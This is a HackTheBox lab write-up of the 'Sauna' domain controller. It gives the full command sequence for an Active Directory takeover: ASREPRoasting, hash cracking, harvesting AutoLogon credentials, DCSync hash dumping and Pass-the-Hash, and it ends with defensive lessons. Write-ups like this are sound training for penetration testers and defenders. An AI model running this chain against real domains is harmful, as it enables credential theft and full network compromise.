📋 This writeup is part of the Lainkusanagi OSCP Like List — a curated collection of machines recommended for OSCP preparation.
TL;DR
Sauna is an Easy Windows Domain Controller from HackTheBox that walks through a realistic Active Directory attack chain. Staff names scraped from a public-facing website are converted into a username list, enabling an ASREPRoasting attack against an account with Kerberos pre-authentication disabled. After cracking the hash and gaining a WinRM shell, WinPEAS uncovers plaintext AutoLogon credentials for a second account. BloodHound then reveals that this account holds DCSync rights, allowing a full domain credential dump and a Pass-the-Hash shell as Administrator.
Tools used: Nmap · Gobuster · Impacket (GetNPUsers, secretsdump) · Hashcat · CrackMapExec · Evil-WinRM · WinPEAS · BloodHound · bloodhound-python
Introduction
Sauna is a retired Easy-difficulty Windows machine on HackTheBox that simulates the Egotistical Bank domain. It’s an excellent introduction to Active Directory offensive techniques, covering OSINT-driven username enumeration, ASREPRoasting, Windows credential exposure via registry AutoLogon, and DCSync — a chain of attacks that mirrors real-world AD compromises almost step for step.
Machine: Sauna OS: Windows Server 2019 Difficulty: Easy Domain: EGOTISTICAL-BANK.LOCAL IP: 10.129.95.180
Enumeration
Port Scanning
nmap -sCV --min-rate=5000 -A 10.129.95.180 -oN scans/nmapinitial.txt -v
Key ports identified — classic Domain Controller fingerprint:
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0 → Egotistical Bank
88/tcp open kerberos Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
389/tcp open ldap EGOTISTICAL-BANK.LOCAL
445/tcp open microsoft-ds
636/tcp open tcpwrapped
3268/tcp open ldap EGOTISTICAL-BANK.LOCAL
The presence of Kerberos (88) and LDAP (389) confirms a Domain Controller. The HTTP server on port 80 is interesting — most DCs don’t run a public website.
Web Enumeration
Visiting http://10.129.95.180 reveals a corporate banking website for Egotistical Bank. A Gobuster scan finds no hidden directories of interest, but browsing the site manually turns up something more valuable — a team page listing employee full names:
- Fergus Smith
- Shaun Coins
- Hugo Bear
- Bowie Taylor
- Sophie Driver
- Steven Kerb
In Active Directory environments, usernames are commonly derived from full names using predictable formats: fsmith, f.smith, fergus.smith, fergussmith. Building a wordlist from these names and testing common AD username formats gives a solid base for the next step.
Initial Foothold
ASREPRoasting — No Password Needed
ASREPRoasting targets accounts that have Kerberos pre-authentication disabled. Normally, a client must prove knowledge of their password before requesting a Kerberos ticket. When pre-auth is disabled, the KDC will hand back an encrypted AS-REP for any user — no password required. That encrypted blob can then be cracked offline.
Using impacket-GetNPUsers with the username list against the domain:
impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/ -format hashcat \
-usersfile users.txt -dc-ip 10.129.95.180
Most users return KDC_ERR_C_PRINCIPAL_UNKNOWN, but one hits:
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:[AS-REP HASH]
fsmith (Fergus Smith) has pre-authentication disabled. The AS-REP hash is saved to a file for offline cracking.
Cracking the AS-REP Hash
hashcat fsmith.hash -m 18200 /usr/share/wordlists/rockyou.txt
[PASSWORD] (fsmith)
Status: Cracked
Credentials obtained: fsmith:[PASSWORD]
Gaining a Shell via WinRM
Validating the credentials with CrackMapExec:
cme winrm 10.129.95.180 -u fsmith -p '[PASSWORD]'
[+] EGOTISTICAL-BANK.LOCAL\fsmith:[PASSWORD] (Pwn3d!)
Logging in with Evil-WinRM:
evil-winrm -u fsmith -p '[PASSWORD]' -i 10.129.95.180
*Evil-WinRM* PS C:\Users\FSmith\Documents> type C:\Users\FSmith\Desktop\user.txt
[USER FLAG]
Privilege Escalation
WinPEAS — AutoLogon Credentials in the Registry
With a foothold as fsmith, WinPEAS is uploaded to C:\temp and executed for local privilege escalation enumeration. Most checks return access denied, but one section stands out — AutoLogon credentials stored in the registry:
Looking for AutoLogon credentials
Some AutoLogon credentials were found!
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : [PASSWORD]
The username stored is svc_loanmanager — but running net users on the box shows the actual account name is svc_loanmgr. Testing with CrackMapExec:
cme winrm 10.129.95.180 -u svc_loanmgr -p '[PASSWORD]'
[+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:[PASSWORD] (Pwn3d!)
A second WinRM-capable account. Now to understand what privileges it holds.
BloodHound — Discovering DCSync Rights
Running bloodhound-python to collect AD data for BloodHound analysis:
bloodhound-python -c ALL -u svc_loanmgr -p '[PASSWORD]' \
-ns 10.129.95.180 -d EGOTISTICAL-BANK.LOCAL
Loading the collected data into BloodHound reveals a critical path: svc_loanmgr has the DS-Replication-Get-Changes-All extended right on the domain object — in other words, full DCSync privileges.
DCSync allows any account with this right to impersonate a Domain Controller and request password hashes for any user in the domain, including the Administrator, directly from NTDS.DIT — without ever touching the DC’s disk.
DCSync — Dumping All Domain Hashes
impacket-secretsdump 'svc_loanmgr:[PASSWORD]'@10.129.95.180
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:[NTLM HASH]
Guest:501:[NTLM HASH]
krbtgt:502:[NTLM HASH]
EGOTISTICAL-BANK.LOCAL\HSmith:1103:[NTLM HASH]
EGOTISTICAL-BANK.LOCAL\FSmith:1105:[NTLM HASH]
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:[NTLM HASH]
SAUNA$:1000:[NTLM HASH]
Every account hash in the domain — including Administrator — is now in hand.
Pass-the-Hash — Getting Administrator
NTLM hashes can be used directly for authentication without cracking them first. Evil-WinRM supports Pass-the-Hash natively:
evil-winrm -u Administrator -H '[NTLM HASH]' -i 10.129.95.180
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator
Grabbing the Root Flag
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
[ROOT FLAG]
Key Takeaways
1. Employee names on public websites are OSINT gold. The team page gave us a working username on the first try. In a real engagement, scraping LinkedIn, company websites, and email signatures is often the fastest path to a valid domain account list.
2. Kerberos pre-authentication should always be required. Disabling it for any account exposes that account to offline hash cracking with no authentication needed. If a legacy application requires pre-auth disabled, the account’s password must be long and complex enough to resist dictionary attacks.
3. AutoLogon credentials in the registry are a critical exposure. Windows stores AutoLogon credentials in plaintext under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon. Any user who can read the registry — which WinPEAS does trivially — can retrieve them. AutoLogon should never be used on domain-joined machines, especially in environments with sensitive accounts.
4. DCSync is a game over condition. Any account holding DS-Replication-Get-Changes-All can dump every hash in the domain silently and remotely. BloodHound makes finding these misconfigurations trivial. Audit replication rights regularly and ensure only legitimate domain controllers hold them.
5. Pass-the-Hash eliminates the need to crack strong passwords. Even if the Administrator’s hash couldn’t be cracked, NTLM hashes are directly usable for authentication. This is why password rotation alone isn’t sufficient — the underlying authentication protocol needs to be hardened or hashes protected.
Thanks for reading! Follow for more HackTheBox writeups covering Active Directory and Windows exploitation techniques.
HackTheBox — Sauna (Easy Windows / Active Directory) was originally published in System Weakness on Medium, where people are continuing the conversation by highlighting and responding to this story.